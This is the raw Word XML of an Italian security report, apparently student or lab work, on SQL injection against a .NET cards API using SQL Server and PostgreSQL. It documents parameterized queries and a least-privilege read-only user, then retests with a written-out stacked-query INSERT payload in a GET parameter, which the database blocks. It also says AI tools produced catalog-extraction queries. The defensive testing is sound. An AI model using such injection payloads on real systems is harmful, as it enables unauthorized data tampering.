          <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono" w:cs="Roboto Mono"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono" w:cs="Roboto Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009542D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>UPDATE...</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009542D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009542D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009542D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> DELETE...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) o i tentativi di </w:t>
      </w:r>
      <w:r w:rsidRPr="009542D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>UNION ALL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono" w:cs="Roboto Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vengono completamente neutralizzati poiché </w:t>
      </w:r>
      <w:r w:rsidR="009542D4">
        <w:t>questo input viene interamente rinchiuso nel parametro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFBAF67" w14:textId="3561D226" w:rsidR="00FA5207" w:rsidRDefault="00FA5207" w:rsidP="009542D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implementazione del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>rinciple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pivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61033E" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00FA5207" w:rsidRDefault="00000000" w:rsidP="00FA5207">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA5207">
        <w:t>Obiettivo della contromisura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C62D93" w14:textId="229305BC" w:rsidR="006766AD" w:rsidRPr="00FA5207" w:rsidRDefault="00FA5207">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t xml:space="preserve">'utilizzo di account amministrativi (come </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00477548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sa</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t xml:space="preserve"> per SQL Server o </w:t>
      </w:r>
      <w:r w:rsidRPr="00477548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t xml:space="preserve"> per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t>) all'interno delle stringhe di connessione dell'applicazione consent</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t xml:space="preserve"> a un attaccante di sfruttare </w:t>
      </w:r>
      <w:r>
        <w:t>la</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t xml:space="preserve"> SQL Injection per eseguire comandi </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">potenzialmente </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t xml:space="preserve">distruttivi (Data Definition Language - DDL e Data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t>Manipulation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t xml:space="preserve"> Language - DML), quali la manipolazione </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o cancellazione </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t xml:space="preserve">arbitraria di dati </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e strutture, </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00FA5207">
        <w:t>o l'elevazione dei privilegi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCF4840" w14:textId="46811486" w:rsidR="006766AD" w:rsidRDefault="00000000" w:rsidP="00FA5207">
      <w:r>
        <w:t xml:space="preserve">Per limitare il "raggio d'azione" di un potenziale attacco, </w:t>
      </w:r>
      <w:r w:rsidR="00FA5207">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> applicato il </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Principio del Minimo Privilegio (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Principle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 - POLP)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FA5207">
        <w:t xml:space="preserve"> Abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA5207">
        <w:t>creato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> un utente dedicato, configurato per disporre esclusivamente dei permessi strettamente necessari al corretto funzionamento dell'applicazione, negando qualsiasi operazione di scrittura o modifica </w:t>
      </w:r>
      <w:r w:rsidR="00FA5207">
        <w:t xml:space="preserve">sia sui dati che sulla </w:t>
      </w:r>
      <w:r>
        <w:t>struttura</w:t>
      </w:r>
      <w:r w:rsidR="00FA5207">
        <w:t xml:space="preserve"> del database</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1413B62A" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000" w:rsidP="00A84364">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_u87wiui2xzc1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t>Configurazione sui DBMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534026EC" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000" w:rsidP="00FA5207">
      <w:r>
        <w:t>L'utente è stato censito ed isolato su entrambi i sistemi di gestione di database utilizzati nel progetto, applicando politiche di restrizione dell'accesso al solo schema applicativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4578E531" w14:textId="272A26AB" w:rsidR="00FA5207" w:rsidRPr="00A84364" w:rsidRDefault="00000000" w:rsidP="00A84364">
      <w:bookmarkStart w:id="13" w:name="_pyqc9u6o6v3d" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="00A84364">
        <w:t>In SQL Server, l'utente è stato associato al database specifico assegnando esplicitamente il permesso di sola lettura</w:t>
      </w:r>
      <w:r w:rsidR="00FA5207" w:rsidRPr="00A84364">
        <w:t xml:space="preserve"> sulle tabelle</w:t>
      </w:r>
      <w:r w:rsidR="00A84364" w:rsidRPr="00A84364">
        <w:t xml:space="preserve">. In </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A84364" w:rsidRPr="00A84364">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A84364" w:rsidRPr="00A84364">
        <w:t>, l'approccio è stato più granulare, andando a revocare i diritti automatici sullo schema public prima di concedere la sola autorizzazione alla query di selezione</w:t>
      </w:r>
      <w:r w:rsidR="00A84364">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af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766AD" w:rsidRPr="00096BC5" w14:paraId="516A2A1C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2083"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3919F11C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###SQL Server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3343805C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 Creazione del login e dell'utente del database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA0244F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CREATE LOGIN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WITH PASSWORD = 'PasswordSicura123!';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D9DD133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CREATE USER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FOR LOGIN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2A6F7DF3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 Assegnazione del solo privilegio di lettura (SELECT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="123FA6D3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ALTER ROLE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db_datareader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ADD MEMBER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2EEFB46F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CE9E09D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 Restrizione esplicita contro inserimenti o modifiche indotte da SQLi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44803DD9" w14:textId="77777777" w:rsidR="00FA5207" w:rsidRDefault="00A84364" w:rsidP="00A84364">
            <w:pPr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DENY INSERT, UPDATE, DELETE TO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30DB514F" w14:textId="77777777" w:rsidR="00A84364" w:rsidRDefault="00A84364" w:rsidP="00A84364">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68CB23D4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### </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>PostgreeSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="542A7DF1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 Creazione del ruolo di login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D2E5F0A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CREATE USER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 WITH PASSWORD 'PasswordSicura123!';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7700F053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A109D5B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-- Revoca dei privilegi di default sullo schema public per l'isolamento</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A7199FA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REVOKE ALL ON SCHEMA public FROM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232CF7A5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REVOKE ALL ON ALL TABLES IN SCHEMA public FROM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0F253708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1BCE954" w14:textId="77777777" w:rsid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 Abilitazione mirata alla sola consultazione (SELECT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="674FF090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GRANT USAGE ON SCHEMA public TO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00CCB53C" w14:textId="77777777" w:rsidR="00A84364" w:rsidRPr="00096BC5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GRANT SELECT ON ALL TABLES IN SCHEMA public TO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  <w:p w14:paraId="0520ABC4" w14:textId="1BA1A6E3" w:rsidR="00A84364" w:rsidRPr="00A84364" w:rsidRDefault="00A84364" w:rsidP="00A84364">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/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ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO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app_reader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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C55A5A9" w14:textId="77777777" w:rsidR="001117A5" w:rsidRPr="001117A5" w:rsidRDefault="001117A5" w:rsidP="001117A5">
      <w:bookmarkStart w:id="14" w:name="_e0v2tmvp6muj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="15" w:name="_yr4zdpn5wczy" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="16" w:name="_2a1hemtr7974" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="298B6D2B" w14:textId="26231E7F" w:rsidR="006766AD" w:rsidRDefault="00000000" w:rsidP="00A84364">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Analisi dei Risultati del Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2486E691" w14:textId="3D10AD38" w:rsidR="001117A5" w:rsidRDefault="001117A5">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="004218B6">
        <w:t>opo aver apportato le modifiche al database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e alla stringa di connessione dell’applicazione</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="004218B6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004218B6">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="004218B6">
        <w:t xml:space="preserve"> replicati i medesimi payload di attacco volti all'inserimento di record arbitrari tramite l'endpoint vulnerabile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17A5" w:rsidRPr="001117A5" w14:paraId="2B52FF28" w14:textId="77777777" w:rsidTr="001117A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68C366FE" w14:textId="6D8739BB" w:rsidR="001117A5" w:rsidRPr="001117A5" w:rsidRDefault="001117A5">
            <w:pPr>
              <w:spacing w:before="240" w:after="240"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GET /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api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/db2/cards/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list?text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 xml:space="preserve">=x'; INSERT INTO </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>public."Cards</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>" (number, issuer) VALUES ('7777', 'Hacker</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>')--</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6095B374" w14:textId="68B2F935" w:rsidR="006766AD" w:rsidRPr="004218B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="004218B6">
        <w:t>L'esito del test ha evidenziato un mutamento radicale nel comportamento del sistema, tracciabile tramite i registri d'errore dell'applicazione:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1256D5" w14:textId="2E4C5F8D" w:rsidR="006766AD" w:rsidRPr="004218B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004218B6">
        <w:t xml:space="preserve">Comportamento di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004218B6">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004218B6">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00021640">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="004218B6">
        <w:t>l motore del DBMS ha intercettato il tentativo di INSERT da parte del modulo applicativo. Rilevando l'assenza dei privilegi necessari per l'</w:t>
      </w:r>
      <w:r w:rsidR="001117A5">
        <w:t>utente</w:t>
      </w:r>
      <w:r w:rsidRPr="004218B6">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004218B6">
        <w:t>Postgres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004218B6">
        <w:t xml:space="preserve"> ha bloccato atomicamente l'intera transazione, restituendo il codice di errore nativo 42501: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004218B6">
        <w:t>permission</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004218B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004218B6">
        <w:t>denied</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004218B6">
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004218B6">
        <w:t>table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004218B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001117A5">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="004218B6">
        <w:t xml:space="preserve">ards. L'applicazione .NET ha intercettato l'eccezione SQL sollevando un codice HTTP 500 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004218B6">
        <w:t>Internal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004218B6">
        <w:t xml:space="preserve"> Server Error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9A2695" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="004218B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004218B6">
        <w:t>Verifica dell'integrità del DB: L'ispezione manuale della tabella da parte dell'amministratore ha confermato che nessun dato malevolo è stato memorizzato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBCA83D" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000" w:rsidP="00A84364">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Utilizzo dell’intelligenza artificiale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538EEB66" w14:textId="5CD14638" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Sebbene i passi da seguire per condurre questo attacco siano stati tutti decisi da </w:t>
      </w:r>
      <w:r w:rsidR="004218B6">
        <w:t>noi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, c’è stato un largo uso degli strumenti di intelligenza artificiale in </w:t>
      </w:r>
      <w:r w:rsidR="00E41DF6">
        <w:t>tre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fasi. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE98D96" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Come anticipato, la prima fase è quella della creazione dell’applicazione e relativo database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E96BB1" w14:textId="11F2BE5C" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">La seconda fase è stata durante la generazione del codice SQL. Le query sulle tabelle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> di SQL Server e sulle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Information_Schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sono infatti state generate da Gemini Pro. Quello che </w:t>
      </w:r>
      <w:r w:rsidR="00FC3C95">
        <w:t>abbiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fatto è stato poi inserire queste query in un attacco di SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B57BFB" w14:textId="707E6533" w:rsidR="00E41DF6" w:rsidRDefault="00E41DF6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">La terza fase è stata la generazione del programma per creare le permutazioni dei campi nella SELECT che estrae le tabelle del database e che viene passata in input </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alla api</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> delle carte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D5219F" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="72778CB4" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="6F5DBB37" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:sectPr w:rsidR="006766A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5D15313-2CEC-4AF4-8359-D0E613A8C1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7ECF95-5EB4-4CFE-AB3B-FB073E05E374}"/>
    <w:embedBold r:id="rId3" w:fontKey="{5E3B0284-D259-4E9D-8D5C-650C6E4FEDD3}"/>
    <w:embedItalic r:id="rId4" w:fontKey="{2ABDEB7D-584D-4504-BD8D-C2897986A75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59BA7ED0-52A0-44EB-990E-A6B80AAD9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77742E-B896-4CA6-99F8-FB7A7357BF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35859"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="691CE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2F06BAE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2B4627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1025385">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2860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AD"/>
    <w:rsid w:val="00021640"/>
    <w:rsid w:val="000266B1"/>
    <w:rsid w:val="00096BC5"/>
    <w:rsid w:val="00106922"/>
    <w:rsid w:val="001117A5"/>
    <w:rsid w:val="002D7410"/>
    <w:rsid w:val="002D7BC6"/>
    <w:rsid w:val="003A74A2"/>
    <w:rsid w:val="004218B6"/>
    <w:rsid w:val="00465442"/>
    <w:rsid w:val="00477548"/>
    <w:rsid w:val="004B03BD"/>
    <w:rsid w:val="005817D1"/>
    <w:rsid w:val="006766AD"/>
    <w:rsid w:val="0072678D"/>
    <w:rsid w:val="00802810"/>
    <w:rsid w:val="008D7437"/>
    <w:rsid w:val="009542D4"/>
    <w:rsid w:val="009A3E78"/>
    <w:rsid w:val="00A10A72"/>
    <w:rsid w:val="00A23EB8"/>
    <w:rsid w:val="00A319A8"/>
    <w:rsid w:val="00A53DA3"/>
    <w:rsid w:val="00A84364"/>
    <w:rsid w:val="00AB6D2F"/>
    <w:rsid w:val="00B36301"/>
    <w:rsid w:val="00B52727"/>
    <w:rsid w:val="00B74396"/>
    <w:rsid w:val="00DA69CC"/>
    <w:rsid w:val="00E41DF6"/>
    <w:rsid w:val="00F038FA"/>
    <w:rsid w:val="00FA5207"/>
    <w:rsid w:val="00FC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4FDE"/>
  <w15:docId w15:val="{9A1B50D2-AEA9-4460-B7E3-0F0B95F3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t" w:eastAsia="it-IT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7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D7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36301"/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13</Pages>
  <Words>3307</Words>
  <Characters>18856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Stefano Mostarda</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-07T19:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-08T21:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>